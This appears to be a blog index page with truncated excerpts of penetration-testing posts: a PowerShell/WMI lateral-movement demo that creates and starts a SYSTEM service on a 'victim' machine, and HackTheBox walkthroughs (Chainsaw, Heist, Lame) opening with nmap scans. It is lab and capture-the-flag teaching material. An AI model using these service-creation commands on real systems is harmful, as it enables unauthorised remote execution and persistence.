Powershell * WMI

Lateral Movement Command Execution Win32_service

PS C:\Users\victim6\Downloads> (Get-CimClass -ClassName Win32_Service).CimClassMethods

Create a service:

PS C:\Users\victim6\Downloads> $servicetype = [byte] 16
PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class Win32_Service -Name Create -ArgumentList $false, "Windows performance", $ErrorControl, $null, $null, "WinPerf", "C:\Windows\System32\calc.exe", $null, $servicetype, "Manual", "NT Authority\system", " "
PS C:\Users\victim6\Downloads> Get-WmiObject -Class Win32_Service -Filter 'name = "WinPerf"'

Start the service:

PS C:\Users\victim6\Downloads> Get-WmiObject…

HACKTHEBOX

Chainsaw – (HackTheBox)

root@kali:~/Downloads# nmap -A 10.10.10.142
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 10:53 GMT
Nmap scan report for 10.10.10.142
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 1001     1001        23828 Dec 05…

HACKTHEBOX

Heist – (HackTheBox)

root@kali:~/Downloads# nmap -A 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01 02:35 GMT
Nmap scan report for 10.10.10.149
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially…

HACKTHEBOX

Lame (HACKTHEBOX)

Method 1:

root@kali:~/Downloads# nmap -A 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-01 18:32 EST
Nmap scan report for 10.10.10.3
Host is up (0.14s latency).
Not shown: 996 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server…